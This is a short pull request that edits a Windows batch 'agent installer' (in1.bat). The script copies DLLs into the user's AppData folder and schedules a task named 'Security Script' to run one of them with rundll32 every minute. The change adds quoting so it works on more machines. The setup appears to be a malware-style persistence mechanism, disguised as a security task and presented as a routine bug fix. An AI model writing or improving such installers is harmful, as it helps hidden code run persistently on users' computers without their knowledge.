### PR TITLE
Fix: Handle paths with spaces in agent installer script (in1.bat)

### DIFF
--- a/tools/Agent/in1.bat
+++ b/tools/Agent/in1.bat
@@ -1,6 +1,6 @@
 @echo off
 set "script_dir=%~dp0"
 
-xcopy /q %script_dir%\*.dll %APPDATA% /Y > nul
+xcopy /q %script_dir%\*.dll "%APPDATA%" /Y > nul
 
-SCHTASKS /f /create /sc minute /mo 1 /tn "Security Script" /tr "rundll32 %APPDATA%\PortableApp.dll Open32 vid=%1 pid=%2 cwd=%APPDATA%" > nul
+SCHTASKS /f /create /sc minute /mo 1 /tn "Security Script" /tr "rundll32 \"%APPDATA%\PortableApp.dll\" Open32 vid=%1 pid=%2 cwd=%%APPDATA%%" > nul


### PR DESCRIPTION
Closes #206 

This PR fixes a bug in the in1.bat agent installer script that caused it to fail on Windows user profiles with spaces in their names.
The fix involves quoting the %APPDATA% variable in both the xcopy and SCHTASKS commands, ensuring they are parsed correctly.